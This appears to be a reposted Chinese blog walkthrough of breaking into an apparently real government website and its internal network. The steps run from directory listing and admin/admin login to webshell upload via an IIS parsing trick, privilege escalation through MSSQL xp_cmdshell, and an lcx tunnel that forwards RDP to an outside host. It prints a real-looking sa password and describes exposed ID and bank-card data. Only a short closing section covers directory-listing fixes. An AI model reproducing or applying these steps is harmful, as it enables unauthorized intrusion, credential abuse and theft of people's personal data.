从目录信息泄露到渗透内网

简介:

simeon

1.目录信息泄露

目录信息泄露是指当当前目录无index.html/index.asp/index.php/index.asp.net等指定主页的情况下,直接显示目录下所有的文件及其目录。测试方法和简单,在网站路径后输入目录名称即可,一般的扫描软件会自动识别该漏洞,如图1所示,显示该网站存在目录漏洞。

                            wKiom1kiuKWgH2zoAAExbHveyO0345.jpg-wh_50

1存在目录泄露漏洞

2.发现后台弱口令

   在目录泄露的基础上,发现网站存在后台管理地址,使用弱口令admin/admin顺利登陆该投票管理系统,如图2所示。出现目录泄露漏洞的网站后台密码一般都比较简单,比如admin/123456admin/adminadmin/admin888等。

wKiom1kiuKXiMVRFAABv1bU_uj8430.jpg-wh_50

2获取后台弱口令

3.泄露文件信息

  如图3所示,通过分析网站的源代码,从源代码中去寻找文件夹,发现存在UpLoadFolder 文件夹,通过地址http://**.*******.gov.cn/UpLoadFolder/进行访问,在该文件夹下有大量的上传文件,单击这些文件链接,可以直接下载文件到本地。

wKioL1kiuKbzztAvAAHAkZyV2og874.jpg-wh_50

3上传的所有文件

4.发现数据库文件

   在该网站hzh目录发现存在db目录,继续访问,如图4所示,可以看到存在db.mdb,如果网站未做安全设置,该数据库文件可以直接下载。

wKioL1kiuKfg6co0AABlaOJTVDc299.jpg-wh_50

4发现数据库文件

5.发现涉及个人隐私的文件

   如图5所示,在网站myupload文件夹下,发现大量的txt文件,打开后,在该文件中包含大量的个人基本信息,身份证账号以及银行卡信息等。

wKiom1kiuKiBWmWnAAJunFkh1pA209.jpg-wh_50

5泄露个人银行卡信息

6.发现上传文件模块

   在网站继续查看泄露目录,如图6所示,获取了memberdl目录,逐个访问文件,其中aa.aspx为文件上传模块。在一些文件上传页面中可以直接上传webshell

wKiom1kiuKiQpK_2AACExEG5gEU535.jpg-wh_50

6获取上传页面

7.构造文件解析漏洞

在文件上传页面,通过查看,发现可以直接创建自定义文件,在该目录中创建1.asp文件夹,如图7所示,可以直接船舰1.asp文件夹;然后选择文件上传,如图8所示,构造一个webshellavi文件,文件名称为1.avi

wKioL1kiuKng880qAACJBD48b60034.jpg-wh_50

7创建1.asp文件夹

wKiom1kiuKni8sNNAACq2Aiir3Y737.jpg-wh_50

8上传1.avi文件

通过浏览1.avi获取文件的url地址,如图9所示,将多数体链接地址复制下来,直接获取webshell,使用中国菜刀管理工具,顺利获取webshell,如图10所示。

wKioL1kiuKmQFTg7AADFf2VBbdQ371.jpg-wh_50

9获取webshell地址

wKiom1kiuKqwEJDNAACmm20xw-M862.jpg-wh_50

10获取webshell

8.获取数据库密码

   通过中国菜刀后门管理工具,上传一个asp的大马,有时候webshell会被查杀或者防火墙拦截,如图11所示上传一个免杀的webshell大马,通过大马对网站文件进行查看,在web.config文件中获取了mssql数据库sa账号和密码“fds%$fDF”。

wKioL1kiuKvgHJAVAAKSuUvzQf0657.jpg-wh_50

11获取数据库密码

9.MSSQL数据库直接提权

    webshell中,选择提权工具-数据库操作,如图12所示,选择组件检测,获取该操作系统为windows2003,数据库为最高权限。

wKioL1kiuKvjWVZWAAE4PIlRYbM096.jpg-wh_50

12检测组件

在系统命令中执行添加用户和添加用户到管理员操作,如图13,图14所示,选择cmd_xpshell执行即可添加用户和到管理员组。

wKiom1kiuKyDOfs1AAFieJQwpK8611.jpg-wh_50

13添加用户和组

wKiom1kiuKyzDskCAAFmCBmIWPs764.jpg-wh_50

14查看管理员组

10.使用lcx穿透进入内网

1)上传lcx文件到C:\ydcz\cl目录

2)执行命令C:\ydcz\cl\lcx.exe -slave 122.115.**. ** 4433 10.0.11.129 3389

如图15所示,该命令表示将10.0.11.1293389端口连接到122.115. **.**4433端口。

3)在122.115. **. **服务器上执行lcx –slave 4433 3389,如图16所示。

wKioL1kiuTDDHKb9AADdx61Kt7U367.jpg-wh_50

15执行端口转发

wKiom1kiuTDSLUu1AABtOO4LISg776.jpg-wh_50

16执行监听

4)在122.115.**.**服务器使用mstsc登录地址127.0.0.1:4433,如图17所示,输入用户名和密码后,成功进入服务器。

wKioL1kiuTCjkRaLAADUO6PwXIM702.jpg-wh_50

17成功进入内网服务器

11.查看和扫描内网

   可以使用端口扫描工具对内网IP进行扫描,有可以通过查看网络邻居-查看工作组计算机来获取内网是否存在多台个人计算机或者服务器,如图18所示,显示该内网存在几十台个人桌面及服务器。

wKioL1kiuTKgtoFyAAKfCyckG4w515.jpg-wh_50

18发现内网存在多台服务器和个人主机

12.利用已有信息进行渗透

   在本例中获取的sa口令是进行内网权限扩展的一个好思路,通过扫描获取10.0.11.31服务器的sa跟掌握的口令一样,通过SQL Tools进行连接,如图19所示,成功获取当前权限为system权限,直接可以添加用户登录3389

wKiom1kiuTKTcUZsAACH_CAp0HY513.jpg-wh_50

19获取系统权限

   由于本案例的目地是介绍通过信息泄露渗透进入内网,对内网的渗透仅仅是通过sa口令进行扩展,在本案例中,通过扫描,发现存在5台计算机使用相同的sa口令,这五台计算机都是系统权限。在这个基础上继续渗透基本可以获取整个网络的权限。

13.目录信息泄露防范

1)禁止Apache显示目录索引,禁止Apache显示目录结构列表,禁止Apache浏览目录。

httpd.conf中的Options Indexes FollowSymLinks # 修改为: Options  FollowSymLinks

修改Apache配置文件httpd.conf

搜索“Options Indexes FollowSymLinks”,修改为“Options-Indexes FollowSymLinks”即可。

Options Indexes FollowSymLinksIndexes前面加上“–”符号。“+”代表允许目录浏览;“–”代表禁止目录浏览,这样的话就属于整个Apache禁止目录浏览了。通过.htaccess文件,可以在根目录新建或修改 .htaccess 文件中添加“Options –Indexes”就可以禁止Apache显示目录索引。

2)在IIS中需要设置“网站属性”-“主目录”-“目录浏览”,即不选择即可。选择表示允许目录浏览。

欢迎加入群513833068进行技术讨论。




 本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/1928354

相关文章
|
6月前
|
数据采集 安全 数据安全/隐私保护
渗透攻击实例-未授权访问/权限绕过
渗透攻击实例-未授权访问/权限绕过
|
9月前
|
安全 前端开发 JavaScript
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
信息服务上线渗透检测网络安全检查报告和解决方案2(安装文件信息泄漏、管理路径泄漏、XSS漏洞、弱口令、逻辑漏洞、终极上传漏洞升级)
131 0
|
4月前
|
供应链 安全 开发工具
供应链安全情报 | 恶意py包伪装代理SDK进行后门攻击,目标锁定python开发者
2023年11月28号,悬镜供应链安全实验室在Pypi官方仓库(https://pypi.org)监测到两起伪装成http和socks5代理SDK的开源组件投毒事件。python开发者一旦下载安装这些投毒Py包(libproxy、libsocks5),会触发执行Py包中的恶意代码,最终将导致开发者系统被投毒者植入恶意后门。
45 0
|
安全 搜索推荐 PHP
记某网络安全设备逻辑缺陷导致的getshell
记某网络安全设备逻辑缺陷导致的getshell
70 0
|
存储 XML JSON
MISP - 恶意软件信息共享平台和威胁共享
版权声明:转载请注明出处:http://blog.csdn.net/dajitui2024 https://blog.csdn.net/dajitui2024/article/details/79396464 参考:https://github.com/MISP/MISP MISP,恶意软件信息共享平台和威胁共享是一个开源软件解决方案,用于收集,存储,分发和共享网络安全指标,并对网络安全事件分析和恶意软件分析构成威胁。
3249 0
|
安全 Windows
Resin远程信息泄露漏洞
受影响系统:   Caucho Technology Resin v3.1.0 for Windows   Caucho Technology Resin v3.
1590 0
|
安全 数据安全/隐私保护
服务器远程的安全管理办法
远程登录进行服务器的管理和维护是管理员的日常工作之一,如何保障远登录的安全性也是大家必须要考虑的问题。本文将从帐户管理和登录工具的安全部署两个方面入手,壹基比小喻教你如何实现服务器的安全登录。一、严密设置加强帐户安全1、帐户改名Administrator和guest是Server 2003默认的系统帐户,正因如此它们是最可能被利用,攻击者通过破解密码而登录服务器。
1887 0
|
安全 网络安全 数据安全/隐私保护